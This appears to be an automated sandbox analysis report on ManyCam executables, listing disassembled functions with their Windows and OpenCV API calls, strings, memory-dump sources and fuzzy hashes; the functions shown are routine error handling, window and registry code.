Instruction Fuzzy Hash: 6D310B70A40208ABDB08EBA5DD92FADB775AF44718F10011EF502A72D2DB797941CB59

Function 00BC41A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,cvSeqElemIdx,00C4124F,.\cxdatastructs.cpp,00000243), ref: 00BC4242

Strings

cvSeqElemIdx, xrefs: 00BC423B
.\cxdatastructs.cpp, xrefs: 00BC4231

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error
String ID: .\cxdatastructs.cpp$cvSeqElemIdx
API String ID: 2619118453-2925048379
Opcode ID: 09b4a1cd809fd9225054c512d379a6b5ac5a896539c91a874981c91ec69bd1a3
Instruction ID: 5c27a964fcf671248ff135ccea82914f5e43c19c6ca289ea2b266aad54ee4a70
Opcode Fuzzy Hash: 09b4a1cd809fd9225054c512d379a6b5ac5a896539c91a874981c91ec69bd1a3
Instruction Fuzzy Hash: A52104373012014B8714CEADE9D1A56F7E6EFD063231887BEE8659B689C731FD468740

Function 0041EED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000004), ref: 0041EEDD

Part of subcall function 0040DA70: SetWindowPos.USER32(000001E2,-0000012B,000001E2,00000000,00000000,00000000,0040880B,?,?,0040880B,00000000,00000000,00000000,000001E2,-0000012B), ref: 0040DA95

Part of subcall function 004065F0: GetParent.USER32(?), ref: 004065FD

Part of subcall function 00406670: GetParent.USER32 ref: 0040669A
Part of subcall function 00406670: GetWindowRect.USER32(?,?), ref: 004066C0
Part of subcall function 00406670: GetWindowLongW.USER32(00000000,000000F0), ref: 004066DD
Part of subcall function 00406670: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0040670D

Part of subcall function 00406640: GetDlgItem.USER32(?,00000000), ref: 00406651

Part of subcall function 00408120: ??_V@YAXPAX@Z.MSVCR80(?,744843B1,?,?,?,?,00000000,00000000,00000000,00000000,0040641C,00000000), ref: 0040815C
Part of subcall function 00408120: lstrlenW.KERNEL32(0040641C,?,?,00000000,00000000,00000000,00000000,0040641C,00000000), ref: 00408172

Part of subcall function 0040DA40: MoveWindow.USER32(000001E2,-0000012B,000001E2,00000000,00000000,00000000,?,?,00408A2E,0000006D,0000002D,00000157,00000017,00000001,00000000,?), ref: 0040DA61

MoveWindow.USER32(00000000,00000000,00000001,000000E7,0000005F,00000048,00000017,00000001,00000113,00000034,000000C6,00000017,00000001,http://www.manycam.com/codec,00000000,00000211), ref: 0041EF99

Strings

http://www.manycam.com/codec, xrefs: 0041EF48

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Window$MoveParentSystem$InfoItemLongMetricsParametersRectlstrlen
String ID: http://www.manycam.com/codec
API String ID: 3918154117-1165702928
Opcode ID: 3c772632c4e0218f7060b3e77bd1fd24f4dad1a2c19bf84bf2807e60cca908d2
Instruction ID: 149f93423e983da9d283a3b54f422c1b69b7f72d1b3e7c1b80e5497dd6e0fc8b
Opcode Fuzzy Hash: 3c772632c4e0218f7060b3e77bd1fd24f4dad1a2c19bf84bf2807e60cca908d2
Instruction Fuzzy Hash: 5C110D70B802096BFB18E7A5CC67FBE7225AF44708F00042DB717BA2C2DAB96520865D

Function 00BCA1D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,icvPolyLine,00C4124F,.\cxdrawing.cpp,00000673,?,?,?,00BCA62F,?,?,?,?,?,?), ref: 00BCA212

Strings

.\cxdrawing.cpp, xrefs: 00BCA201
icvPolyLine, xrefs: 00BCA20B

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error
String ID: .\cxdrawing.cpp$icvPolyLine
API String ID: 2619118453-3292343506
Opcode ID: 625b7acb11b80ec620a6380c7633cd195bc4d6e99aa862bdf4c3ef0bf7bb59e6
Instruction ID: cb776b31bfdd91f76d7de8cd840d01781ed7fe453c4ffbe66181dcdb93851342
Opcode Fuzzy Hash: 625b7acb11b80ec620a6380c7633cd195bc4d6e99aa862bdf4c3ef0bf7bb59e6
Instruction Fuzzy Hash: 161104727047146B8724D95ADC40E67F3EAEFC8B28F14816DF509D3254E671FE0586A1

Function 004C4AC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.MSVCR80(00000000,00533F58,?,?,?,?,?,?,004BCB55,?,00533F58,000000FF,00533F58,004B85D2,00000000,00000000), ref: 004C4AD1
_invalid_parameter_noinfo.MSVCR80(?,00000000,00533F58,?,?,?,?,?,?,004BCB55,?,00533F58,000000FF,00533F58,004B85D2,00000000), ref: 004C4AEE

Strings

X?S, xrefs: 004C4B3E, 004C4B6F, 004C4B4E, 004C4B64, 004C4B41, 004C4B51

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: X?S
API String ID: 3215553584-928156776
Opcode ID: 300afce18172fda367b1e5a93a3139029df3230341556c5fc4a0edfbb8e029cc
Instruction ID: 6e252d52473bf057cc5c9ab3544af976a75f27afc912d5b1b1ccf3972680467b
Opcode Fuzzy Hash: 300afce18172fda367b1e5a93a3139029df3230341556c5fc4a0edfbb8e029cc
Instruction Fuzzy Hash: 7B214178E00204EFCB44EFA5C6A0E6FBB75AF89315B14819EE4055B311D738EE41CBA8

Function 00490E90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.MSVCR80(?,0049315F,?,00000000,?,?,0048D60B,000000FF,?,?,00499CB6,?,?,?,00531AE6,000000FF), ref: 00490EA1
_invalid_parameter_noinfo.MSVCR80(00000003,?,0049315F,?,00000000,?,?,0048D60B,000000FF,?,?,00499CB6,?,?,?,00531AE6), ref: 00490EBE

Strings

_1I, xrefs: 00490F0E, 00490F3F, 00490F1E, 00490F34, 00490F11, 00490F21

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: _1I
API String ID: 3215553584-1375489561
Opcode ID: f8a0f0cd8858169583a3bfb7bac23ac9426c047314b7327a1f008bdd9c0947f0
Instruction ID: 39ed61a2cd6add22cacd6874f090497504692926125bc87bb284fc13d1f3f6b2
Opcode Fuzzy Hash: f8a0f0cd8858169583a3bfb7bac23ac9426c047314b7327a1f008bdd9c0947f0
Instruction Fuzzy Hash: 12213E74A00204EFCF04EFA5C58086EBF76AF89315B1489AEE4459B305CB38EA41CBA4

Function 00407190 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000040,?,00000000,00000040,?,?,004C7AEB,AppVersion,?,00000040,80000002,SOFTWARE\ManyCam,00020019), ref: 004071CC

Strings

zL, xrefs: 004071C6
zL, xrefs: 004071A1, 004071AB

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: QueryValue
String ID: zL$zL
API String ID: 3660427363-3006479296
Opcode ID: 9f65d8b26e372b6834f41cd3cc3a1fe9bf163b5c16fb74d4df2668fbdcee74fa
Instruction ID: fe241e5347fe9cda23539dab786d815e97edc30d153e6fd0c4fb1542d65cb657
Opcode Fuzzy Hash: 9f65d8b26e372b6834f41cd3cc3a1fe9bf163b5c16fb74d4df2668fbdcee74fa
Instruction Fuzzy Hash: 90211074A04209EBDB18CF99C454BAFB7B1FF84300F1085AEE911AB3D0D778A941CB96

Function 00BC6930 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,cvFindGraphEdgeByPtr,00C4124F,.\cxdatastructs.cpp,00000BDA), ref: 00BC69B0

Strings

.\cxdatastructs.cpp, xrefs: 00BC699F
cvFindGraphEdgeByPtr, xrefs: 00BC69A9

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error
String ID: .\cxdatastructs.cpp$cvFindGraphEdgeByPtr
API String ID: 2619118453-339326160
Opcode ID: 7fe4465645b0089315a54556de861450e794a9d54f85deaaaeb471b126bb918d
Instruction ID: 6782d05348fc048405afca37a743b42bee9a255f9c4a7e329f3d92e698a703eb
Opcode Fuzzy Hash: 7fe4465645b0089315a54556de861450e794a9d54f85deaaaeb471b126bb918d
Instruction Fuzzy Hash: 73019E337002114B8734D91D8881F66F3D5EFC8F65B2906BDEAA8D7290D7B0EC404251

Function 004535B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004B77A0: fwprintf.MSVCR80 ref: 004B7842
Part of subcall function 004B77A0: fflush.MSVCR80 ref: 004B7852

clock.MSVCR80 ref: 00453606
_DebugHeapAllocator.LIBCPMTD ref: 00453624

Strings

Entering: %s, xrefs: 004535F0

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeapclockfflushfwprintf
String ID: Entering: %s
API String ID: 1338021872-1508582857
Opcode ID: 0a03b20c66a4bdf864266057b93037efe44b4c8f81b8abca9714b6f92b0e190a
Instruction ID: 630723a52c49dda7b07cbf3efddf69ebd1aec7d1a56bd84d85dfb89b8348d68f
Opcode Fuzzy Hash: 0a03b20c66a4bdf864266057b93037efe44b4c8f81b8abca9714b6f92b0e190a
Instruction Fuzzy Hash: CE1130B5904209EFDB04DF98D841AAEB7B4FF48714F00865DF82597381D7746904CBA5

Function 004AE2E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.MSVCR80(?,?,004AE1A3,CJ,00000000,?,004AE043,?,?,00000000,000000FF,004AD900,00000000,?,?,000000FF), ref: 004AE2EF
_invalid_parameter_noinfo.MSVCR80(?,?,004AE1A3,CJ,00000000,?,004AE043,?,?,00000000,000000FF,004AD900,00000000,?,?,000000FF), ref: 004AE32B

Strings

CJ, xrefs: 004AE2F9, 004AE335, 004AE312

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: CJ
API String ID: 3215553584-1577928124
Opcode ID: 70cad1bad6b93677a8aa04d1a4551bdbb9f1c5421a9a58d61efe08efc66d9194
Instruction ID: 1e5a07180b79b9d77b03a7b872fd22e8548e40f80d8fa90e55785185c90aae0e
Opcode Fuzzy Hash: 70cad1bad6b93677a8aa04d1a4551bdbb9f1c5421a9a58d61efe08efc66d9194
Instruction Fuzzy Hash: A401D731600008DFCB08DF59D694A6EFBB6EF66301F258199E9069B355C734AE50DB88

Function 004E29E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.MSVCR80(?,?,004E1883,CN,000000FF,?,004E0A43,?,?,000000FF,?), ref: 004E29EF
_invalid_parameter_noinfo.MSVCR80(?,?,004E1883,CN,000000FF,?,004E0A43,?,?,000000FF,?), ref: 004E2A25

Strings

CN, xrefs: 004E29FF, 004E2A35, 004E2A15

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: CN
API String ID: 3215553584-3860229782
Opcode ID: 3ded8f196a3c02e06d8d6a8014f10332241c82d37bf5bc7cecde32a8ae69c9c0
Instruction ID: 055c263bba3631ac84532d8d275a506bca3ff744e03e32cc4505f628b268f32f
Opcode Fuzzy Hash: 3ded8f196a3c02e06d8d6a8014f10332241c82d37bf5bc7cecde32a8ae69c9c0
Instruction Fuzzy Hash: 6D110234A00049EFCB14DF45C280DADB7B6FB99305B25C299E8068B315DB31AF46DB84

Function 00412C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.MSVCR80(?,?,004129C3,C A,00000000,?,00412043,?,?,00000000,-0000012B,0040F9E0,00000000,?,?,-0000012B), ref: 00412C2F
_invalid_parameter_noinfo.MSVCR80(?,?,004129C3,C A,00000000,?,00412043,?,?,00000000,-0000012B,0040F9E0,00000000,?,?,-0000012B), ref: 00412C65

Strings

C A, xrefs: 00412C39, 00412C6F, 00412C4F

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: C A
API String ID: 3215553584-432193327
Opcode ID: dd3759dd0edff71de197c755aad0b75e312425a4acb4d65829b04bcd21f34736
Instruction ID: d50c8c72ee7c7c5e73367f5c550ec2d48e9c8be17f747839894a4a99daa275eb
Opcode Fuzzy Hash: dd3759dd0edff71de197c755aad0b75e312425a4acb4d65829b04bcd21f34736
Instruction Fuzzy Hash: 0E01E931600008DFCB08CF48D7D49ADFBB6EF69345B668199E5069B315D730EE90DB98

Function 00413CB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.MSVCR80(?,?,004138F3,c7A,00000000,?,00413763,?,?,00000000,?,004136D0,?,?,?,45A), ref: 00413CBF
_invalid_parameter_noinfo.MSVCR80(?,?,004138F3,c7A,00000000,?,00413763,?,?,00000000,?,004136D0,?,?,?,45A), ref: 00413CF5

Strings

c7A, xrefs: 00413CCF, 00413D05, 00413CE5

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: c7A
API String ID: 3215553584-604798297
Opcode ID: 3ded8f196a3c02e06d8d6a8014f10332241c82d37bf5bc7cecde32a8ae69c9c0
Instruction ID: 4f8a117557595d7ace3a85e6c39e7ac69620622392f626f59c62cc3483bdb0bb
Opcode Fuzzy Hash: 3ded8f196a3c02e06d8d6a8014f10332241c82d37bf5bc7cecde32a8ae69c9c0
Instruction Fuzzy Hash: 3511D335A00009EFCB14DF48C290C9DB7B6FF99305B258199E9069B315EB31AF86DB88

Function 004228B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetCursorInfo.USER32(00000014), ref: 004228C4
ScreenToClient.USER32(?,?), ref: 004228D5

Strings

(B, xrefs: 004228EC, 004228EF, 004228F9

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: ClientCursorInfoScreen
String ID: (B
API String ID: 1381309574-891251851
Opcode ID: 183b5d1f9ba3f3a11c0528ae00216a5e4976ffd3210267904aec7597f6dd3387
Instruction ID: 56ec9ec03ba55985748cef6039b39fbaea006a6cc74428b082933960e72c1f85
Opcode Fuzzy Hash: 183b5d1f9ba3f3a11c0528ae00216a5e4976ffd3210267904aec7597f6dd3387
Instruction Fuzzy Hash: 89F0ECB5A00209AFCB04DF98D985C9EBBB9FF88310F10C158FA49A7350D730EA45DB91

Function 004B7880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 00454C20: _time64.MSVCR80 ref: 00454C25

fwprintf.MSVCR80 ref: 004B78B3
fflush.MSVCR80 ref: 004B78C3

Strings

| %x %X | , xrefs: 004B7892

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: _time64fflushfwprintf
String ID: | %x %X |
API String ID: 804399740-1669508960
Opcode ID: a995debcebdf332dee2d0cd15bea4d7e243787ad81cf3f31d987c7b7fad9b84e
Instruction ID: 998b554e6e78045c2d5deda0b84162204a47a87edbaee598bb3a96ab0b245df9
Opcode Fuzzy Hash: a995debcebdf332dee2d0cd15bea4d7e243787ad81cf3f31d987c7b7fad9b84e
Instruction Fuzzy Hash: 4BF05471C01108ABDF04FB95DD868AEB738FF54309B5045A9E91667242DB34AA1CCBE5

Function 004150C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

memmove_s.MSVCR80 ref: 004150FA

Strings

nAA, xrefs: 004150C9
nAA, xrefs: 004150D2

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: memmove_s
String ID: nAA$nAA
API String ID: 1646303785-1657967095
Opcode ID: 48a814f637bbc169a426d2c1a272fa5cac1a1cc5ee3381e8494429463483b6d0
Instruction ID: 831bdc283bfef77eb9b1cad694d4ede0d3f081278f3ad19dba345cc0dbbac6ca
Opcode Fuzzy Hash: 48a814f637bbc169a426d2c1a272fa5cac1a1cc5ee3381e8494429463483b6d0
Instruction Fuzzy Hash: 0CF0D47090010DEFCB14DF9CC885D9EBBB8FB88344F10829DE919A7300E630EAA5CB90

Function 00C408F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

cvRegisterType.GLU32 ref: 00C4093C

Part of subcall function 00C275D0: isalpha.MSVCR80 ref: 00C27619
Part of subcall function 00C275D0: cvError.GLU32(000000FB,cvRegisterType,Type name should start with a letter or _,.\cxpersistence.cpp,000012F6), ref: 00C27641

Part of subcall function 00C3FE87: __onexit.MSVCRT ref: 00C3FE8B

Strings

opencv-nd-matrix, xrefs: 00C4090C
(, xrefs: 00C40904

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: ErrorRegisterType__onexitisalpha
String ID: ($opencv-nd-matrix
API String ID: 3878073915-3914869136
Opcode ID: 5d1f803b9c4849a0ec754cbf220b345302570d72cc4b4fa432b755c65376a61d
Instruction ID: 881c7b0a1b335f881c8b1ee61f738cfa7df516533a978a4af4541dc26c146bff
Opcode Fuzzy Hash: 5d1f803b9c4849a0ec754cbf220b345302570d72cc4b4fa432b755c65376a61d
Instruction Fuzzy Hash: E5F0D4F04093119FC744EF14D58965FBBE0BB88348F50495CE49896611E7B482888B82

